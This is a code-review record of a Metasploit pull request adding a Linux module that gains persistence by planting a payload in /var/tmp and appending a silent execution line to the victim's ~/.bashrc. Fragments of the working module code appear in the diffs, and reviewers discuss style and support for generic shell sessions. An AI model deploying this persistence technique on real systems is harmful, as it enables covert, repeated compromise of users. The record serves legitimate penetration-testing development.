### PR TITLE
Added Linux Bash profile persistence module

### PR DESCRIPTION
**Pull request by bluesentinelsec**
This module establishes persistence via the Linux Bash profile method.
This module makes two changes to the target system.
First, the module writes a payload to a directory (`/var/temp/` by default).
Second, the module writes a payload execution trigger to the Bash profile (`~/.bashrc` by default).
The persistent payload is executed whenever the victim user opens a Bash terminal.

## Verification
  1. Start `msfconsole`
  2. Get a Linux Meterpreter session
  3. `use exploit/linux/local/bash_profile_persistence`
  4. `set SESSION [SESSION]`
  5. `run`
  6. On victim, open a new Bash terminal
  7. You should get a new session with the permissions of the exploited user account

### CODE REVIEW

File: documentation/modules/exploit/linux/local/bash_profile_persistence.md [hunk 1]
```diff
@@ -0,0 +1,56 @@
+# Documentation
```
Comment (cbrnrd) [inline documentation/modules/exploit/linux/local/bash_profile_persistence.md]: Remove this line

File: documentation/modules/exploit/linux/local/bash_profile_persistence.md [hunk 2]
```diff
@@ -0,0 +1,56 @@
...
+  2. Get a Meterpreter session
+  3. `use exploit/linux/local/bash_profile_persistence`
+  4. `set SESSION [SESSION]`
+  5. `run`
+  6. On victim, open a new Bash terminal
+  7. You should get a new session with the permissions of the exploited user account
+
+## Options
+
+  **SESSION**
```
Comment (cbrnrd) [inline documentation/modules/exploit/linux/local/bash_profile_persistence.md]: This option is assumed for the module type.

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 3]
```diff
@@ -0,0 +1,112 @@
...
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Bash Profile Persistence',
+        'Description'    => "
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]: Please use `%Q{...}` for the description.

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 4]
```diff
@@ -0,0 +1,112 @@
...
+        ",
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Michael Long <bluesentinel[at]protonmail.com>'
+          ],
+        'DisclosureDate' => 'Jun 8 1989', # First public release of Bourne Again Shell
+        'Platform'       => ['unix', 'linux'],
+        'Arch'           => ARCH_CMD,
+        'SessionTypes'   => ['meterpreter'],
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]: Any reason it's just meterpreter?

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 5]
```diff
@@ -0,0 +1,112 @@
...
+    register_options(
+      [
+        OptString.new('BASH_PROFILE', [true, 'Target Bash profile location. Usually ~/.bashrc or ~/.bash_profile.', '~/.bashrc']),
+        OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp/'])
+      ]
+    )
+  end
+
+  def exploit
+
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]: remove empty line

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 6]
```diff
@@ -0,0 +1,112 @@
...
+    if !exist?(profile_path)
+      fail_with Failure::NotFound, profile_path
+    end
+    print_status("Bash profile exists: #{profile_path}")
+
+    # check that target Bash profile file is writable
+    if !writable?(profile_path)
+      fail_with Failure::NoAccess, profile_path
+    end
+    print_status("Bash profile is writable: #{profile_path}")
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]: This should probably be `print_good`

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 7]
```diff
@@ -0,0 +1,112 @@
...
+    upload_and_chmodx(payload_file, payload.encoded)
+
+    # write payload trigger to Bash profile
+    exec_payload_string = "#{payload_file} > /dev/null 2>&1 &" # send stdin,out,err to /dev/null
+    append_file(profile_path, exec_payload_string)
+    print_good("Created Bash profile persistence")
+    print_good("Payload will be triggered when target opens a Bash terminal")
+    print_warning("Don't forget to start your handler:")
+    print_warning("msf> handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}")
+
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]: remove empty line

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 8]
```diff
@@ -0,0 +1,112 @@
...
+    end
+
+    # check that target Bash profile file exists
+    if !exist?(profile_path)
+      fail_with Failure::NotFound, profile_path
+    end
+    print_status("Bash profile exists: #{profile_path}")
+
+    # check that target Bash profile file is writable
+    if !writable?(profile_path)
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]:
```suggestion
    unless writable?(profile_path)
```

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 9]
```diff
@@ -0,0 +1,112 @@
...
+
+    # expand home directory path (i.e. '~/.bashrc' becomes '/home/user/.bashrc')
+    profile_path = datastore['BASH_PROFILE']
+    if profile_path == '~/.bashrc'
+      home_directory = session.sys.config.getenv('$HOME')
+      profile_path = home_directory + "/.bashrc"
+    end
+
+    # check that target Bash profile file exists
+    if !exist?(profile_path)
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]:
```suggestion
    unless exist?(profile_path)
```

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 10]
```diff
@@ -0,0 +1,112 @@
...
+      fail_with Failure::NotFound, profile_path
+    end
+    print_status("Bash profile exists: #{profile_path}")
```
Comment (cbrnrd) [inline modules/exploits/linux/local/bash_profile_persistence.rb]: Should probably be `print_good`

**Review by cbrnrd — CHANGES_REQUESTED** [review]
Pretty good overall, just some stylistic changes. Thanks for writing this!

File: modules/exploits/linux/local/bash_profile_persistence.rb (hunk 4 above)
Comment (bluesentinelsec) [reply modules/exploits/linux/local/bash_profile_persistence.rb]: Presently the module throws an error when executed in generic shells:
`[-] Exploit failed: NoMethodError undefined method `sys' for #<Session:shell 127.0.0.1:34166 (127.0.0.1) >`
I think its being caused by these lines:
```
home_directory = session.sys.config.getenv('$HOME')
...
hostname = session.sys.config.sysinfo["Computer"]
```

**Comment by bluesentinelsec** [comment]
Thanks for the feedback and improvement @cbrnrd !

File: modules/exploits/linux/local/bash_profile_persistence.rb (hunk 4 above)
Comment (cbrnrd) [reply modules/exploits/linux/local/bash_profile_persistence.rb]: Yep that would be it. If you can find an alternative way to get the home directory (say by executing a shell command or something else) that should make it work on shell sessions as well.

Comment (bluesentinelsec) [reply modules/exploits/linux/local/bash_profile_persistence.rb]: I added support for standard shell sessions.
If the Meterpreter API method fails, the module runs shell commands to pull the user's home directory and host name.

**Review by cdelafuente-r7 — COMMENTED** [review]
Thanks for your feedback and suggestions @cbrnrd, much appreciated.

Great contribution @bluesentinelsec, thank you! I just have some comments before it lands.

**Comment by cdelafuente-r7** [comment]
It would be interesting to have this module more generic and compatible with other OS shell configuration files (e.g. zsh, korn shell, csh, etc.). I don't think this would require a lot of changes. Probably just its name, description and the home directory path expansion logic, as suggested in https://github.com/rapid7/metasploit-framework/pull/12641#discussion_r356230702.

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 11]
```diff
@@ -0,0 +1,119 @@
...
+  def exploit
+
+    # expand home directory path (i.e. '~/.bashrc' becomes '/home/user/.bashrc')
+    profile_path = datastore['BASH_PROFILE']
+    if profile_path == '~/.bashrc'
+      begin
+        home_directory = session.sys.config.getenv('$HOME')
+      rescue
+        home_directory = cmd_exec("echo ~")
+      end
```
[the remark this answers is not in the document]
Comment (bluesentinelsec) [reply modules/exploits/linux/local/bash_profile_persistence.rb]: Great feedback; your solution is much cleaner.

File: modules/exploits/linux/local/bash_profile_persistence.rb [hunk 12]
```diff
@@ -0,0 +1,119 @@
...
+    end
+
+    timestamp = "_" + ::Time.now.strftime("%Y%m%d.%H%M%S")
+
+    log_directory_name = ::File.join(Msf::Config.log_directory, 'persistence/' + hostname + timestamp)
+
+    ::FileUtils.mkdir_p(log_directory_name)
+
+    log_file_name = log_directory_name + "_Bash_Profile.backup"
+    file_local_write(log_file_name, backup_profile)
```
[the remark this answers is not in the document]
Comment (bluesentinelsec) [reply modules/exploits/linux/local/bash_profile_persistence.rb]: Fixed

**Comment by cdelafuente-r7** [comment]
Thanks for updating the code.

I just noticed that you've submitted from your `master` branch and we cannot merge it this way (please see https://github.com/rapid7/metasploit-framework/wiki/So-Your-PR-was-closed#your-submitted-a-pr-from-your-master-branch).

Please, can you create a new branch and re-push?
```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

Also, we usually don't want "Merge" commits to appear in the commit history. Please, can you `git rebase -i` and drop all the merge commits?
Another option is to take a clean checkout of master and `git cherry-pick` every commit you want to keep.

**Comment by cdelafuente-r7** [comment]
I am closing this PR because it has been submitted from a fork master branch and Github does not let you change the source branch.

@bluesentinelsec, please, re-push and resubmit a new PR when you get a chance. I will approve it and land it. Thanks!

**Comment by bluesentinelsec** [comment]
@cdelafuente-r7 Thank you for the guidance and patience; I'm still learning how to Git.
I had issues cleaning up my commits with git rebase, so I opted to run a hard reset to make my fork match upstream/master. I apologize if this causes inconvenience.

**Pull request closed without merging**